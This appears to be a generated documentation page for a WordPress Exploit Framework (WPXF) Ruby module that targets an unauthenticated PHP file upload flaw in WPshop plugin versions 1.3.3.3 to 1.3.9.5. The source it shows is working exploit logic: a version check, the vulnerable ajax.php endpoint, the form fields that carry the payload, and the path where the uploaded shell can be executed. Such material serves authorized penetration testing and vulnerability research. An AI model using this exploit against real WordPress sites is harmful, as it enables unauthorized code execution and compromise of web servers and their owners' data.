class Wpxf::Exploit::WpshopShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 6 def initialize super update_info( name: 'WPshop Shell Upload', desc: 'This module exploits a file upload vulnerability in versions '\ '1.3.3.3 to 1.3.9.5 of the WPshop plugin which '\ 'allows unauthenticated users to upload and execute PHP scripts '\ 'in the context of the web server.', author: [ 'g0blin', # Vulnerability discovery 'rastating' # WPXF module ], references: [ ['WPVDB', '7830'], ['URL', 'https://research.g0blin.co.uk/g0blin-00036/'] ], date: 'Mar 09 2015' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 27 def check check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3') end
payload_body_builder()
click to toggle source
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 31 def payload_body_builder builder = Utility::BodyBuilder.new builder.add_field('elementCode', 'ajaxUpload') builder.add_file_from_string('wpshop_file', payload.encoded, payload_name) builder end
uploaded_payload_location()
click to toggle source
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 42 def uploaded_payload_location normalize_uri(wordpress_url_wp_content, 'uploads', payload_name) end
uploader_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 38 def uploader_url normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php') end